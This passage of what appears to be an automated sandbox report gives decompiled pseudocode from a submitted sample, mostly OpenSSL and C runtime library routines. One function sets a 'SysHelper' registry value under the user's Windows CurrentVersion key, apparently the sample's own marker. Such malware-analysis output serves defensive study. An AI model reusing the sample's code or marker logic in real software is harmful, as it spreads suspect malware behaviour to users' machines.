                                                                                    				void* _t38;
                                                                                    				intOrPtr* _t39;
                                                                                    				intOrPtr* _t40;
                                                                                    				char* _t41;
                                                                                    				void* _t42;
                                                                                    				char* _t43;
                                                                                    
                                                                                    				_t45 = __ebp;
                                                                                    				_t38 = __edx;
                                                                                    				_t34 = __ebx;
                                                                                    				_t40 = _a4;
                                                                                    				_t39 = _a8;
                                                                                    				 *_t39 = 0;
                                                                                    				if(_t40 == 0) {
                                                                                    					L26:
                                                                                    					return 1;
                                                                                    				} else {
                                                                                    					_t12 =  *_t40;
                                                                                    					if(_t12 == 0 || _t12 == 0xa) {
                                                                                    						goto L26;
                                                                                    					} else {
                                                                                    						_t13 = E00448190(_t40, "Proc-Type: ", 0xb);
                                                                                    						_t60 = _t13;
                                                                                    						if(_t13 == 0) {
                                                                                    							__eflags =  *((char*)(_t40 + 0xb)) - 0x34;
                                                                                    							if( *((char*)(_t40 + 0xb)) != 0x34) {
                                                                                    								goto L5;
                                                                                    							} else {
                                                                                    								__eflags =  *((char*)(_t40 + 0xc)) - 0x2c;
                                                                                    								if( *((char*)(_t40 + 0xc)) != 0x2c) {
                                                                                    									goto L5;
                                                                                    								} else {
                                                                                    									_t41 = _t40 + 0xd;
                                                                                    									__eflags = E00448190(_t41, "ENCRYPTED", 9);
                                                                                    									if(__eflags == 0) {
                                                                                    										_t16 =  *_t41;
                                                                                    										__eflags = _t16 - 0xa;
                                                                                    										if(_t16 == 0xa) {
                                                                                    											L13:
                                                                                    											__eflags =  *_t41;
                                                                                    											if(__eflags != 0) {
                                                                                    												_t42 = _t41 + 1;
                                                                                    												__eflags = E00448190(_t42, "DEK-Info: ", 0xa);
                                                                                    												if(__eflags == 0) {
                                                                                    													_t43 = _t42 + 0xa;
                                                                                    													__eflags = _t43;
                                                                                    													_t37 = _t43;
                                                                                    													_push(_t34);
                                                                                    													while(1) {
                                                                                    														_t35 =  *_t43;
                                                                                    														__eflags = _t35 - 0x41;
                                                                                    														if(_t35 < 0x41) {
                                                                                    															goto L20;
                                                                                    														}
                                                                                    														__eflags = _t35 - 0x5a;
                                                                                    														if(_t35 <= 0x5a) {
                                                                                    															L22:
                                                                                    															_t43 = _t43 + 1;
                                                                                    															continue;
                                                                                    														}
                                                                                    														L20:
                                                                                    														__eflags = _t35 - 0x2d;
                                                                                    														if(_t35 == 0x2d) {
                                                                                    															goto L22;
                                                                                    														}
                                                                                    														_t6 = _t35 - 0x30; // -48
                                                                                    														__eflags = _t6 - 9;
                                                                                    														if(_t6 <= 9) {
                                                                                    															goto L22;
                                                                                    														}
                                                                                    														 *_t43 = 0;
                                                                                    														_t19 = E0047ECD0(_t37);
                                                                                    														 *_t39 = _t19;
                                                                                    														 *_t43 = _t35;
                                                                                    														_a4 = _t43 + 1;
                                                                                    														_pop(_t36);
                                                                                    														__eflags = _t19;
                                                                                    														if(__eflags != 0) {
                                                                                    															_t22 = E00464360( &_a4, _t39 + 4,  *((intOrPtr*)(_t19 + 0xc)));
                                                                                    															asm("sbb eax, eax");
                                                                                    															return  ~( ~_t22);
                                                                                    														} else {
                                                                                    															E004512D0(_t36, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x72, ".\\crypto\\pem\\pem_lib.c", 0x219);
                                                                                    															__eflags = 0;
                                                                                    															return 0;
                                                                                    														}
                                                                                    														goto L27;
                                                                                    													}
                                                                                    												} else {
                                                                                    													E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x69, ".\\crypto\\pem\\pem_lib.c", 0x200);
                                                                                    													__eflags = 0;
                                                                                    													return 0;
                                                                                    												}
                                                                                    											} else {
                                                                                    												goto L14;
                                                                                    											}
                                                                                    										} else {
                                                                                    											while(1) {
                                                                                    												__eflags = _t16;
                                                                                    												if(__eflags == 0) {
                                                                                    													break;
                                                                                    												}
                                                                                    												_t16 =  *((intOrPtr*)(_t41 + 1));
                                                                                    												_t41 = _t41 + 1;
                                                                                    												__eflags = _t16 - 0xa;
                                                                                    												if(_t16 != 0xa) {
                                                                                    													continue;
                                                                                    												} else {
                                                                                    													goto L13;
                                                                                    												}
                                                                                    												goto L27;
                                                                                    											}
                                                                                    											L14:
                                                                                    											E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x70, ".\\crypto\\pem\\pem_lib.c", 0x1fd);
                                                                                    											__eflags = 0;
                                                                                    											return 0;
                                                                                    										}
                                                                                    									} else {
                                                                                    										E004512D0(__ebx, _t38, _t39, __ebp, __eflags, 9, 0x6b, 0x6a, ".\\crypto\\pem\\pem_lib.c", 0x1f9);
                                                                                    										__eflags = 0;
                                                                                    										return 0;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						} else {
                                                                                    							E004512D0(__ebx, _t38, _t39, __ebp, _t60, 9, 0x6b, 0x6b, ".\\crypto\\pem\\pem_lib.c", 0x1f4);
                                                                                    							L5:
                                                                                    							return 0;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L27:
                                                                                    			}


















                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004633fb
                                                                                    0x00463402
                                                                                    0x00463412
                                                                                    0x0046341a
                                                                                    0x0046341e
                                                                                    0x0046341e
                                                                                    0x004633ce
                                                                                    0x004633de
                                                                                    0x004633e6
                                                                                    0x004633ea
                                                                                    0x004633ea
                                                                                    0x004633cc
                                                                                    0x004633b5
                                                                                    0x0046338e
                                                                                    0x0046339e
                                                                                    0x004633a7
                                                                                    0x004633aa
                                                                                    0x004633aa
                                                                                    0x0046338c
                                                                                    0x0046336c
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strncmp
                                                                                    • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                    • API String ID: 909875538-2908105608
                                                                                    • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                    • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                    • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                    • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 81%
                                                                                    			E004C5D39(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                    				intOrPtr _v12;
                                                                                    				signed int _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				signed int _v32;
                                                                                    				unsigned int _v52;
                                                                                    				signed int _v56;
                                                                                    				signed int _v60;
                                                                                    				signed int _t32;
                                                                                    				signed int* _t34;
                                                                                    				signed int _t36;
                                                                                    				signed int _t42;
                                                                                    				signed int _t47;
                                                                                    				char* _t48;
                                                                                    				signed int _t49;
                                                                                    				signed int _t52;
                                                                                    				unsigned int _t58;
                                                                                    				signed int _t59;
                                                                                    				signed int _t60;
                                                                                    				void* _t63;
                                                                                    				signed int _t66;
                                                                                    				signed int _t73;
                                                                                    				void* _t78;
                                                                                    				char* _t79;
                                                                                    				signed int _t80;
                                                                                    				signed int _t81;
                                                                                    				signed int _t83;
                                                                                    				void* _t89;
                                                                                    				void* _t93;
                                                                                    
                                                                                    				_t63 = __edx;
                                                                                    				_t89 = _t93;
                                                                                    				_t78 = E0042501F(__ebx);
                                                                                    				if(_t78 != 0) {
                                                                                    					_push(__ebx);
                                                                                    					__eflags =  *(_t78 + 0x24);
                                                                                    					if( *(_t78 + 0x24) != 0) {
                                                                                    						L7:
                                                                                    						_t79 =  *(_t78 + 0x24);
                                                                                    						_t32 = E0042C0FD(_t79, 0x86, E004C5D13(_a4));
                                                                                    						__eflags = _t32;
                                                                                    						if(_t32 != 0) {
                                                                                    							_push(0);
                                                                                    							_push(0);
                                                                                    							_push(0);
                                                                                    							_push(0);
                                                                                    							_push(0);
                                                                                    							E004242FD(0x86, _t63);
                                                                                    							asm("int3");
                                                                                    							_push(_t89);
                                                                                    							__eflags = _v32;
                                                                                    							_push(_t79);
                                                                                    							if(__eflags != 0) {
                                                                                    								_t80 = _v16;
                                                                                    								__eflags = _t80;
                                                                                    								if(__eflags == 0) {
                                                                                    									goto L10;
                                                                                    								} else {
                                                                                    									_t7 = _t80 - 1; // -1
                                                                                    									_t36 = E0043FF8E(_v20, _t80, E004C5D13(_v12), _t7);
                                                                                    									__eflags = _t36;
                                                                                    									if(_t36 == 0) {
                                                                                    										goto L11;
                                                                                    									} else {
                                                                                    										_push(0);
                                                                                    										_push(0);
                                                                                    										_push(0);
                                                                                    										_push(0);
                                                                                    										_push(0);
                                                                                    										E004242FD(0x86, _t63);
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										_t58 = _v52;
                                                                                    										_push(0);
                                                                                    										__eflags = _t58;
                                                                                    										if(_t58 == 0) {
                                                                                    											L34:
                                                                                    											return _v60;
                                                                                    										} else {
                                                                                    											_push(_t80);
                                                                                    											_push(0x86);
                                                                                    											_t52 = _t58;
                                                                                    											_t83 = _v56;
                                                                                    											__eflags = _t83 & 0x00000003;
                                                                                    											_t73 = _v60;
                                                                                    											if((_t83 & 0x00000003) != 0) {
                                                                                    												while(1) {
                                                                                    													_t42 =  *_t83;
                                                                                    													_t83 = _t83 + 1;
                                                                                    													 *_t73 = _t42;
                                                                                    													_t73 = _t73 + 1;
                                                                                    													_t58 = _t58 - 1;
                                                                                    													__eflags = _t58;
                                                                                    													if(_t58 == 0) {
                                                                                    														goto L26;
                                                                                    													}
                                                                                    													__eflags = _t42;
                                                                                    													if(_t42 == 0) {
                                                                                    														__eflags = _t73 & 0x00000003;
                                                                                    														if((_t73 & 0x00000003) == 0) {
                                                                                    															L30:
                                                                                    															_t52 = _t58;
                                                                                    															_t59 = _t58 >> 2;
                                                                                    															__eflags = _t59;
                                                                                    															if(_t59 != 0) {
                                                                                    																goto L46;
                                                                                    															} else {
                                                                                    																goto L31;
                                                                                    															}
                                                                                    														} else {
                                                                                    															while(1) {
                                                                                    																 *_t73 = _t42;
                                                                                    																_t73 = _t73 + 1;
                                                                                    																_t58 = _t58 - 1;
                                                                                    																__eflags = _t58;
                                                                                    																if(_t58 == 0) {
                                                                                    																	goto L49;
                                                                                    																}
                                                                                    																__eflags = _t73 & 0x00000003;
                                                                                    																if((_t73 & 0x00000003) != 0) {
                                                                                    																	continue;
                                                                                    																} else {
                                                                                    																	goto L30;
                                                                                    																}
                                                                                    																goto L50;
                                                                                    															}
                                                                                    															goto L49;
                                                                                    														}
                                                                                    													} else {
                                                                                    														__eflags = _t83 & 0x00000003;
                                                                                    														if((_t83 & 0x00000003) != 0) {
                                                                                    															continue;
                                                                                    														} else {
                                                                                    															_t52 = _t58;
                                                                                    															_t60 = _t58 >> 2;
                                                                                    															__eflags = _t60;
                                                                                    															if(_t60 != 0) {
                                                                                    																goto L36;
                                                                                    															} else {
                                                                                    																goto L23;
                                                                                    															}
                                                                                    														}
                                                                                    													}
                                                                                    													goto L50;
                                                                                    												}
                                                                                    												goto L26;
                                                                                    											} else {
                                                                                    												_t60 = _t58 >> 2;
                                                                                    												__eflags = _t60;
                                                                                    												if(_t60 != 0) {
                                                                                    													do {
                                                                                    														L36:
                                                                                    														_t47 =  *_t83 ^ 0xffffffff ^ 0x7efefeff +  *_t83;
                                                                                    														_t66 =  *_t83;
                                                                                    														_t83 = _t83 + 4;
                                                                                    														__eflags = _t47 & 0x81010100;
                                                                                    														if((_t47 & 0x81010100) == 0) {
                                                                                    															goto L35;
                                                                                    														} else {
                                                                                    															__eflags = _t66;
                                                                                    															if(_t66 == 0) {
                                                                                    																__eflags = 0;
                                                                                    																 *_t73 = 0;
                                                                                    																goto L45;
                                                                                    															} else {
                                                                                    																__eflags = _t66;
                                                                                    																if(_t66 == 0) {
                                                                                    																	 *_t73 = _t66 & 0x000000ff;
                                                                                    																	goto L45;
                                                                                    																} else {
                                                                                    																	__eflags = _t66 & 0x00ff0000;
                                                                                    																	if((_t66 & 0x00ff0000) == 0) {
                                                                                    																		 *_t73 = _t66 & 0x0000ffff;
                                                                                    																		goto L45;
                                                                                    																	} else {
                                                                                    																		__eflags = _t66 & 0xff000000;
                                                                                    																		if((_t66 & 0xff000000) != 0) {
                                                                                    																			goto L35;
                                                                                    																		} else {
                                                                                    																			 *_t73 = _t66;
                                                                                    																			L45:
                                                                                    																			_t73 = _t73 + 4;
                                                                                    																			_t42 = 0;
                                                                                    																			_t59 = _t60 - 1;
                                                                                    																			__eflags = _t59;
                                                                                    																			if(_t59 != 0) {
                                                                                    																				L46:
                                                                                    																				_t42 = 0;
                                                                                    																				__eflags = 0;
                                                                                    																				do {
                                                                                    																					 *_t73 = 0;
                                                                                    																					_t73 = _t73 + 4;
                                                                                    																					_t59 = _t59 - 1;
                                                                                    																					__eflags = _t59;
                                                                                    																				} while (_t59 != 0);
                                                                                    																			}
                                                                                    																			_t52 = _t52 & 0x00000003;
                                                                                    																			__eflags = _t52;
                                                                                    																			if(_t52 != 0) {
                                                                                    																				goto L31;
                                                                                    																			} else {
                                                                                    																				L49:
                                                                                    																				return _v60;
                                                                                    																			}
                                                                                    																		}
                                                                                    																	}
                                                                                    																}
                                                                                    															}
                                                                                    														}
                                                                                    														goto L50;
                                                                                    														L35:
                                                                                    														 *_t73 = _t66;
                                                                                    														_t73 = _t73 + 4;
                                                                                    														_t60 = _t60 - 1;
                                                                                    														__eflags = _t60;
                                                                                    													} while (_t60 != 0);
                                                                                    													L23:
                                                                                    													_t52 = _t52 & 0x00000003;
                                                                                    													__eflags = _t52;
                                                                                    													if(_t52 == 0) {
                                                                                    														goto L26;
                                                                                    													} else {
                                                                                    														goto L24;
                                                                                    													}
                                                                                    												} else {
                                                                                    													while(1) {
                                                                                    														L24:
                                                                                    														_t42 =  *_t83;
                                                                                    														_t83 = _t83 + 1;
                                                                                    														 *_t73 = _t42;
                                                                                    														_t73 = _t73 + 1;
                                                                                    														__eflags = _t42;
                                                                                    														if(_t42 == 0) {
                                                                                    															break;
                                                                                    														}
                                                                                    														_t52 = _t52 - 1;
                                                                                    														__eflags = _t52;
                                                                                    														if(_t52 != 0) {
                                                                                    															continue;
                                                                                    														} else {
                                                                                    															L26:
                                                                                    															return _v60;
                                                                                    														}
                                                                                    														goto L50;
                                                                                    													}
                                                                                    													L32:
                                                                                    													_t52 = _t52 - 1;
                                                                                    													__eflags = _t52;
                                                                                    													if(_t52 != 0) {
                                                                                    														L31:
                                                                                    														 *_t73 = _t42;
                                                                                    														_t73 = _t73 + 1;
                                                                                    														__eflags = _t73;
                                                                                    														goto L32;
                                                                                    													}
                                                                                    													goto L34;
                                                                                    												}
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							} else {
                                                                                    								L10:
                                                                                    								_t34 = E00425208(__eflags);
                                                                                    								_t81 = 0x16;
                                                                                    								 *_t34 = _t81;
                                                                                    								E004242D2();
                                                                                    								_t36 = _t81;
                                                                                    								L11:
                                                                                    								return _t36;
                                                                                    							}
                                                                                    						} else {
                                                                                    							_t48 = _t79;
                                                                                    							goto L5;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t49 = E00428C96(0x86, 1);
                                                                                    						 *(_t78 + 0x24) = _t49;
                                                                                    						__eflags = _t49;
                                                                                    						if(_t49 != 0) {
                                                                                    							goto L7;
                                                                                    						} else {
                                                                                    							_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                                                                    							L5:
                                                                                    							goto L6;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                                                                    					L6:
                                                                                    					return _t48;
                                                                                    				}
                                                                                    				L50:
                                                                                    			}































                                                                                    0x004c5d6e
                                                                                    0x004c5d6e
                                                                                    0x004c5d73
                                                                                    0x00000000
                                                                                    0x004c5d74
                                                                                    0x004c5d6c
                                                                                    0x004c5d48
                                                                                    0x004c5d48
                                                                                    0x004c5d75
                                                                                    0x004c5d77
                                                                                    0x004c5d77
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                      • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                      • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                      • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                      • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                      • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                    • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                    • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                    • __invoke_watson.LIBCMT ref: 004C5D9B
                                                                                    • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                    • __invoke_watson.LIBCMT ref: 004C5DEB
                                                                                    Strings
                                                                                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
                                                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                    • API String ID: 2139067377-798102604
                                                                                    • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                    • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                    • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                    • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040C6A0() {
                                                                                    				void* _v8;
                                                                                    				char _v12;
                                                                                    				int _v16;
                                                                                    				int _v20;
                                                                                    				char _t16;
                                                                                    
                                                                                    				_v8 = 0;
                                                                                    				_t16 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 0xf003f,  &_v8);
                                                                                    				if(_t16 != 0) {
                                                                                    					L4:
                                                                                    					return 1;
                                                                                    				} else {
                                                                                    					_v12 = _t16;
                                                                                    					_v20 = 4;
                                                                                    					_v16 = 4;
                                                                                    					if(RegQueryValueExW(_v8, L"SysHelper", 0,  &_v20,  &_v12,  &_v16) != 0) {
                                                                                    						_v12 = 1;
                                                                                    						RegSetValueExW(_v8, L"SysHelper", 0, 4,  &_v12, 4);
                                                                                    						RegCloseKey(_v8);
                                                                                    						goto L4;
                                                                                    					} else {
                                                                                    						RegCloseKey(_v8);
                                                                                    						return 0;
                                                                                    					}
                                                                                    				}
                                                                                    			}









                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                    • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseValue$OpenQuery
                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                    • API String ID: 3962714758-1667468722
                                                                                    • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                    • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                    • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                    • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 88%
                                                                                    			E004573F0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, char _a28, signed int _a60, intOrPtr _a68, char _a72, signed int _a76, signed int _a80, signed int _a84, signed int _a88, intOrPtr _a92, signed int _a96, intOrPtr _a100, signed char _a104) {
                                                                                    				signed int _v0;
                                                                                    				signed int _v4;
                                                                                    				intOrPtr _v8;
                                                                                    				char _v16;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t129;
                                                                                    				intOrPtr _t135;
                                                                                    				signed int _t136;
                                                                                    				signed int _t140;
                                                                                    				void* _t141;
                                                                                    				signed int _t143;
                                                                                    				signed int _t148;
                                                                                    				void* _t150;
                                                                                    				intOrPtr _t154;
                                                                                    				signed char _t160;
                                                                                    				char _t166;
                                                                                    				intOrPtr _t170;
                                                                                    				signed int _t174;
                                                                                    				signed int _t181;
                                                                                    				signed int* _t182;
                                                                                    				intOrPtr _t184;
                                                                                    				intOrPtr _t185;
                                                                                    				void* _t186;
                                                                                    				intOrPtr _t187;
                                                                                    				signed char _t189;
                                                                                    				signed int _t192;
                                                                                    				signed int* _t196;
                                                                                    				signed int _t199;
                                                                                    				intOrPtr* _t200;
                                                                                    				signed int _t203;
                                                                                    				signed int _t205;
                                                                                    				signed int _t206;
                                                                                    				void* _t208;
                                                                                    				intOrPtr _t209;
                                                                                    				signed int _t213;
                                                                                    				intOrPtr _t214;
                                                                                    				intOrPtr* _t217;
                                                                                    				signed int _t220;
                                                                                    				signed int _t221;
                                                                                    				void* _t223;
                                                                                    				signed int _t224;
                                                                                    				signed int _t225;
                                                                                    				signed int _t226;
                                                                                    				signed int _t231;
                                                                                    				intOrPtr* _t232;
                                                                                    				signed int* _t233;
                                                                                    				void* _t235;
                                                                                    				signed int _t240;
                                                                                    				void* _t241;
                                                                                    				signed int _t242;
                                                                                    				signed int _t243;
                                                                                    				signed int _t244;
                                                                                    				signed int _t245;
                                                                                    				intOrPtr _t249;
                                                                                    				intOrPtr _t250;
                                                                                    				signed int _t253;
                                                                                    				signed int _t257;
                                                                                    				void* _t262;
                                                                                    				signed char _t268;
                                                                                    
                                                                                    				E0042F7C0(0x40);
                                                                                    				_t129 =  *0x50ad20; // 0x84f4da2
                                                                                    				_a60 = _t129 ^ _t253;
                                                                                    				_t187 = _a100;
                                                                                    				_t181 = _a84;
                                                                                    				_t249 = _a68;
                                                                                    				_a28 = _a72;
                                                                                    				_a8 = _a76;
                                                                                    				_v0 = _a80;
                                                                                    				_t220 = 0;
                                                                                    				_a4 = 0x4ffca4;
                                                                                    				_a12 = 0;
                                                                                    				_t188 =  <  ? 0 : _t187;
                                                                                    				_t213 = _a88;
                                                                                    				_a100 =  <  ? 0 : _t187;
                                                                                    				_t189 = _a104;
                                                                                    				if((_t189 & 0x00000040) == 0) {
                                                                                    					_t257 = _t213;
                                                                                    					if(_t257 > 0 || _t257 >= 0 && _t181 >= 0) {
                                                                                    						__eflags = _t189 & 0x00000002;
                                                                                    						if((_t189 & 0x00000002) == 0) {
                                                                                    							__eflags = _t189 & 0x00000004;
                                                                                    							_a16 = 0x20;
                                                                                    							_t179 =  !=  ? _a16 : 0;
                                                                                    							_a12 =  !=  ? _a16 : 0;
                                                                                    						} else {
                                                                                    							_a12 = 0x2b;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t181 =  ~_t181;
                                                                                    						_a12 = 0x2d;
                                                                                    						asm("adc edx, eax");
                                                                                    						_t213 =  ~_t213;
                                                                                    					}
                                                                                    				}
                                                                                    				_t135 = _a92;
                                                                                    				if((_t189 & 0x00000008) != 0) {
                                                                                    					if(_t135 != 8) {
                                                                                    						__eflags = _a92 - 0x10;
                                                                                    						_t178 =  !=  ? 0x4ffca4 : "0x";
                                                                                    						_a4 =  !=  ? 0x4ffca4 : "0x";
                                                                                    						_t135 = _a92;
                                                                                    					} else {
                                                                                    						_a4 = "0";
                                                                                    					}
                                                                                    				}
                                                                                    				_a16 = "0123456789abcdef";
                                                                                    				_t230 =  !=  ? 1 : _t220;
                                                                                    				_t262 =  !=  ? 1 : _t220;
                                                                                    				_t192 =  ==  ? _a16 : "0123456789ABCDEF";
                                                                                    				_t231 = _t192;
                                                                                    				while(1) {
                                                                                    					_t136 = E0043AE20(_t181, _t213, _t135, 0);
                                                                                    					_a4 = _t181;
                                                                                    					_t181 = _t136;
                                                                                    					 *((char*)(_t253 + _t220 + 0x30)) =  *((intOrPtr*)(_t192 + _t231));
                                                                                    					_t220 = _t220 + 1;
                                                                                    					_t192 = _t181 | _t213;
                                                                                    					if(_t192 == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_t135 = _a92;
                                                                                    					if(_t220 < 0x1a) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					break;
                                                                                    				}
                                                                                    				_t232 = _a4;
                                                                                    				_a16 = _t220;
                                                                                    				if(_t220 != 0x1a) {
                                                                                    					if(__eflags >= 0) {
                                                                                    						E0042AC83();
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						E0042F7C0(4);
                                                                                    						_t140 = _a8;
                                                                                    						_t214 = 0;
                                                                                    						__eflags = _t140;
                                                                                    						_v16 = 0;
                                                                                    						_t196 =  !=  ? _t140 : "<NULL>";
                                                                                    						_t141 = 0;
                                                                                    						_a8 = _t196;
                                                                                    						__eflags =  *_t196;
                                                                                    						if( *_t196 != 0) {
                                                                                    							do {
                                                                                    								_t141 = _t141 + 1;
                                                                                    								__eflags =  *(_t141 + _t196);
                                                                                    							} while ( *(_t141 + _t196) != 0);
                                                                                    						}
                                                                                    						_t199 =  <  ? _t214 : _a16 - _t141;
                                                                                    						__eflags = _a12 & 0x00000001;
                                                                                    						_a16 = _t199;
                                                                                    						if((_a12 & 0x00000001) != 0) {
                                                                                    							_t199 =  ~_t199;
                                                                                    							_a16 = _t199;
                                                                                    						}
                                                                                    						_push(_t181);
                                                                                    						_t182 = _v0;
                                                                                    						_push(_t249);
                                                                                    						_t250 = _v8;
                                                                                    						_push(_t232);
                                                                                    						_t233 = _a4;
                                                                                    						_push(_t220);
                                                                                    						_t221 = _v4;
                                                                                    						__eflags = _t199;
                                                                                    						if(_t199 > 0) {
                                                                                    							while(1) {
                                                                                    								__eflags = _t214 - _a20;
                                                                                    								if(_t214 >= _a20) {
                                                                                    									goto L71;
                                                                                    								}
                                                                                    								__eflags = _t221;
                                                                                    								if(_t221 != 0) {
                                                                                    									__eflags =  *_t182 -  *_t233;
                                                                                    									if( *_t182 >=  *_t233) {
                                                                                    										do {
                                                                                    											__eflags =  *_t221;
                                                                                    											if( *_t221 != 0) {
                                                                                    												 *_t233 =  *_t233 + 0x400;
                                                                                    												__eflags =  *_t233;
                                                                                    												_t150 = E00454F30( *_t221,  *_t233, ".\\crypto\\bio\\b_print.c", 0x2ed);
                                                                                    												_t253 = _t253 + 0x10;
                                                                                    												 *_t221 = _t150;
                                                                                    											} else {
                                                                                    												__eflags =  *_t233;
